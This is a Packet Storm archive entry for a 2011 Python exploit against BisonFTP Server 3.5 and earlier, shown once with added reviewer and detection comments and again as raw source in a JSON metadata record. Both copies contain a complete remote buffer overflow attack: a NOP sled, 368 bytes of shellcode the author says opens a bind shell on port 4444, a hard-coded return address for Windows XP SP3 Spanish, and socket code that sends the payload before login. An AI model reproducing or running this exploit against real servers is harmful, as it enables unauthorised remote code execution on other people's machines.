ID PACKETSTORM:103896
Type packetstorm
Reporter localh0t
Modified 2011-08-11T00:00:00
Description
`#!/usr/bin/python
# BisonFTP Server <=v3.5 Remote Buffer Overflow Exploit
# Newer versions not tested, maybe vulnerable too
# written by localh0t
# Date: 10/08/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar | www.mfsec.com.ar
# Thanks to: Pr0zac, Irakirashia, Kchito
# Targets: Windows XP SP3 Spanish (No DEP) (Change as you wish)
# Shellcode: List shell on port 4444 (Change as you wish)
#
# NOTE(review): archived proof-of-concept for a stack-based overflow in
# BisonFTP's handling of an over-long FTP command line, kept here for
# defensive reference. The script is Python 2 (print statements, str-based
# byte buffers; under Python 3 the socket send would reject a str). As
# listed, the body of the `if` below sits at column 0, so the file does not
# parse as-is -- the indentation was presumably lost when it was archived.
# `struct` and `os` are imported but never used.
# Mitigation side: the header itself scopes the PoC to a single OS/language
# build with DEP disabled; DEP/ASLR on the host invalidates the hard-coded
# return address, and the affected server version (<=3.5) should be retired.
from socket import *
import sys, struct, os, time
# Expects <host> and <port> as positional arguments; prints usage otherwise.
if (len(sys.argv) < 3):
print "\nBisonFTP Server <=v3.5 Remote Buffer Overflow Exploit"
print "\n Usage: %s <host> <port> \n" %(sys.argv[0])
sys.exit()
print "\n[!] Connecting to %s ..." %(sys.argv[1])
# connect to host, read up to 1024 bytes of banner (return value ignored),
# then wait 5 s before sending anything. No authentication is performed,
# so the server is reachable by this payload pre-login.
sock = socket(AF_INET,SOCK_STREAM)
sock.connect((sys.argv[1],int(sys.argv[2])))
sock.recv(1024)
time.sleep(5)
# padding: 1092 NOP bytes (0x90) precede the payload.
# Detection note: the whole request is one FTP command line of
# 1092 + 368 + 8 + 4 + 1 = 1473 bytes, almost entirely 0x90, terminated by
# a bare LF -- a pattern that stands out on unauthenticated FTP traffic
# and is a reasonable thing to alert on for this server.
buffer = "\x90" * 1092
# 368 bytes shellcode (24 lines of 15 bytes plus a final 8; the count
# matches the comment). The header says it is a bind shell on port 4444;
# that cannot be confirmed from the raw bytes here, so treat it as the
# author's claim. Any host where port 4444 opens after such a request
# should be considered compromised.
buffer += ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"+
"\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"+
"\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"+
"\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"+
"\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"+
"\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"+
"\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"+
"\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"+
"\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"+
"\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"+
"\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"+
"\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"+
"\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"+
"\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"+
"\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"+
"\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"+
"\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"+
"\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"+
"\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"+
"\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"+
"\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"+
"\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"+
"\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"+
"\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"+
"\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")
# more padding
buffer += "\x90" * 8
# jmp edx (shell32.dll Windows XP SP3 Spanish) (edx points to the 1st nopsled)
# The overwritten return address is hard-coded for that one build, which is
# what the header's "Change as you wish" refers to. On any other module
# layout, or with DEP enabled, the likely outcome is a crash of the FTP
# service (denial of service) rather than code execution.
buffer += "\x9a\x5c\x3c\x7e"
# end connection
# A trailing LF terminates the FTP command line; nothing else is sent.
buffer += "\x0a"
# send buffer
print "[!] Sending exploit..."
sock.send(buffer)
sock.recv(1024)
sock.close()
# The success message is printed unconditionally -- the script never
# checks whether the overflow actually did anything.
print "[!] Exploit succeed. Now netcat %s on port 4444\n" %(sys.argv[1])
sys.exit()
`
{"id": "PACKETSTORM:103896", "type": "packetstorm", "bulletinFamily": "exploit", "title": "BisonFTP Server 3.5 Buffer Overflow", "description": "", "published": "2011-08-11T00:00:00", "modified": "2011-08-11T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/103896/BisonFTP-Server-3.5-Buffer-Overflow.html", "reporter": "localh0t", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:28:39", "viewCount": 8, "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.6}, "sourceHref": "https://packetstormsecurity.com/files/download/103896/bisonftp-overflow.txt", "sourceData": "`#!/usr/bin/python \n# BisonFTP Server <=v3.5 Remote Buffer Overflow Exploit \n# Newer version's not tested, maybe vulnerable too \n# written by localh0t \n# Date: 10/08/11 \n# Contact: mattdch0@gmail.com \n# Follow: @mattdch \n# www.localh0t.com.ar | www.mfsec.com.ar \n# Thanks to: Pr0zac, Irakirashia, Kchito \n# Targets: Windows XP SP3 Spanish (No DEP) (Change as you wish) \n# Shellcode: List shell on port 4444 (Change as you wish) \n \nfrom socket import * \nimport sys, struct, os, time \n \nif (len(sys.argv) < 3): \nprint \"\\nBisonFTP Server <=v3.5 Remote Buffer Overflow Exploit\" \nprint \"\\n Usage: %s <host> <port> \\n\" %(sys.argv[0]) \nsys.exit() \n \nprint \"\\n[!] 
Connecting to %s ...\" %(sys.argv[1]) \n \n# connect to host \nsock = socket(AF_INET,SOCK_STREAM) \nsock.connect((sys.argv[1],int(sys.argv[2]))) \nsock.recv(1024) \ntime.sleep(5) \n \n# padding \nbuffer = \"\\x90\" * 1092 \n \n# 368 bytes shellcode \nbuffer += (\"\\x33\\xc9\\x83\\xe9\\xaa\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\"+ \n\"\\xbb\\xc1\\x9c\\x35\\x83\\xee\\xfc\\xe2\\xf4\\x47\\x29\\x15\\x35\\xbb\\xc1\"+ \n\"\\xfc\\xbc\\x5e\\xf0\\x4e\\x51\\x30\\x93\\xac\\xbe\\xe9\\xcd\\x17\\x67\\xaf\"+ \n\"\\x4a\\xee\\x1d\\xb4\\x76\\xd6\\x13\\x8a\\x3e\\xad\\xf5\\x17\\xfd\\xfd\\x49\"+ \n\"\\xb9\\xed\\xbc\\xf4\\x74\\xcc\\x9d\\xf2\\x59\\x31\\xce\\x62\\x30\\x93\\x8c\"+ \n\"\\xbe\\xf9\\xfd\\x9d\\xe5\\x30\\x81\\xe4\\xb0\\x7b\\xb5\\xd6\\x34\\x6b\\x91\"+ \n\"\\x17\\x7d\\xa3\\x4a\\xc4\\x15\\xba\\x12\\x7f\\x09\\xf2\\x4a\\xa8\\xbe\\xba\"+ \n\"\\x17\\xad\\xca\\x8a\\x01\\x30\\xf4\\x74\\xcc\\x9d\\xf2\\x83\\x21\\xe9\\xc1\"+ \n\"\\xb8\\xbc\\x64\\x0e\\xc6\\xe5\\xe9\\xd7\\xe3\\x4a\\xc4\\x11\\xba\\x12\\xfa\"+ \n\"\\xbe\\xb7\\x8a\\x17\\x6d\\xa7\\xc0\\x4f\\xbe\\xbf\\x4a\\x9d\\xe5\\x32\\x85\"+ \n\"\\xb8\\x11\\xe0\\x9a\\xfd\\x6c\\xe1\\x90\\x63\\xd5\\xe3\\x9e\\xc6\\xbe\\xa9\"+ \n\"\\x2a\\x1a\\x68\\xd3\\xf2\\xae\\x35\\xbb\\xa9\\xeb\\x46\\x89\\x9e\\xc8\\x5d\"+ \n\"\\xf7\\xb6\\xba\\x32\\x44\\x14\\x24\\xa5\\xba\\xc1\\x9c\\x1c\\x7f\\x95\\xcc\"+ \n\"\\x5d\\x92\\x41\\xf7\\x35\\x44\\x14\\xcc\\x65\\xeb\\x91\\xdc\\x65\\xfb\\x91\"+ \n\"\\xf4\\xdf\\xb4\\x1e\\x7c\\xca\\x6e\\x48\\x5b\\x04\\x60\\x92\\xf4\\x37\\xbb\"+ \n\"\\xd0\\xc0\\xbc\\x5d\\xab\\x8c\\x63\\xec\\xa9\\x5e\\xee\\x8c\\xa6\\x63\\xe0\"+ \n\"\\xe8\\x96\\xf4\\x82\\x52\\xf9\\x63\\xca\\x6e\\x92\\xcf\\x62\\xd3\\xb5\\x70\"+ \n\"\\x0e\\x5a\\x3e\\x49\\x62\\x32\\x06\\xf4\\x40\\xd5\\x8c\\xfd\\xca\\x6e\\xa9\"+ \n\"\\xff\\x58\\xdf\\xc1\\x15\\xd6\\xec\\x96\\xcb\\x04\\x4d\\xab\\x8e\\x6c\\xed\"+ \n\"\\x23\\x61\\x53\\x7c\\x85\\xb8\\x09\\xba\\xc0\\x11\\x71\\x9f\\xd1\\x5a\\x35\"+ 
\n\"\\xff\\x95\\xcc\\x63\\xed\\x97\\xda\\x63\\xf5\\x97\\xca\\x66\\xed\\xa9\\xe5\"+ \n\"\\xf9\\x84\\x47\\x63\\xe0\\x32\\x21\\xd2\\x63\\xfd\\x3e\\xac\\x5d\\xb3\\x46\"+ \n\"\\x81\\x55\\x44\\x14\\x27\\xc5\\x0e\\x63\\xca\\x5d\\x1d\\x54\\x21\\xa8\\x44\"+ \n\"\\x14\\xa0\\x33\\xc7\\xcb\\x1c\\xce\\x5b\\xb4\\x99\\x8e\\xfc\\xd2\\xee\\x5a\"+ \n\"\\xd1\\xc1\\xcf\\xca\\x6e\\xc1\\x9c\\x35\") \n \n# more padding \nbuffer += \"\\x90\" * 8 \n \n# jmp edx (shell32.dll Windows XP SP3 Spanish) (edx points to the 1st nopsled) \nbuffer += \"\\x9a\\x5c\\x3c\\x7e\" \n \n# end connection \nbuffer += \"\\x0a\" \n \n# send buffer \nprint \"[!] Sending exploit...\" \nsock.send(buffer) \nsock.recv(1024) \nsock.close() \nprint \"[!] Exploit succeed. Now netcat %s on port 4444\\n\" %(sys.argv[1]) \nsys.exit() \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645415987}}
{}